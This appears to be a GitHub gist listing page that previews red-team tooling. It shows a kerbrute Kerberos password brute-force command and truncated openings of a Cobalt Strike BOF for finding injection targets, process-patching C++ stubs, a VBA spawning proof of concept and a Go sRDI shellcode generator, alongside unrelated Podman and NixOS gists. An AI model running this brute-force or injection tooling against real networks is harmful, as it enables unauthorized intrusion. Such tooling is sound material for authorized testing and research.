With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Ronan Kervella lesnuages
G0ldenGunSec
/ EnumCLR.c
Last active
February 23, 2024 10:37
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
juanje
/ podman_comands.sh
Created
June 10, 2020 14:53
Run Redis with Podman. As a Systemd service and as a Pod.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is a simple example of how to run a basic service inside a container with Podman | |
| # Podman | |
| ## Pull the Docker image | |
| podman pull docker.io/redis | |
| ## Run the container as you would do with Docker | |
| podman run -d --name redis_server -p 6379:6379 redis | |
| # But Podman facilitate some extra ways: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| BOOL PatchTheRet(HMODULE realModule) { | |
| // Get primary module info |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| DWORD WINAPI Thread(LPVOID lpParam) { | |
| // Insert evil stuff | |
| ExitProcess(0); |
xpn
/ PCMPBNMBAO_x86_poc.vba
Created
October 26, 2019 23:31
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
| ' by @_xpn_ | |
| ' | |
| ' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
| Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
| Const HEAP_ZERO_MEMORY = &H8& | |
| Const SW_HIDE = &H0& | |
| Const MAX_PATH = 260 | |
| Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| BSD 3-Clause License | |
| Copyright (c) 2019, Odzhan. All rights reserved. | |
| Redistribution and use in source and binary forms, with or without | |
| modification, are permitted provided that the following conditions are met: | |
| * Redistributions of source code must retain the above copyright notice, this | |
| list of conditions and the following disclaimer. |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
leoloobeek
/ ShellcodeRDI.go
Last active
January 23, 2023 16:49
Go implementation of https://github.com/monoxgas/sRDI/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| * | |
| * This is just a Go implementation of https://github.com/monoxgas/sRDI/ | |
| * Useful if you're trying to generate shellcode for reflective DLL | |
| * injection in Go, otherwise probably not much use :) | |
| * | |
| * The project, shellcode, most comments within this project | |
| * are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas) |
This file has been truncated, but you can view the full file.
ladinu
/ encryptedNixos.md
Last active
March 1, 2024 07:19
NixOS install with encrypted /boot /root with single password unlock
NewerOlder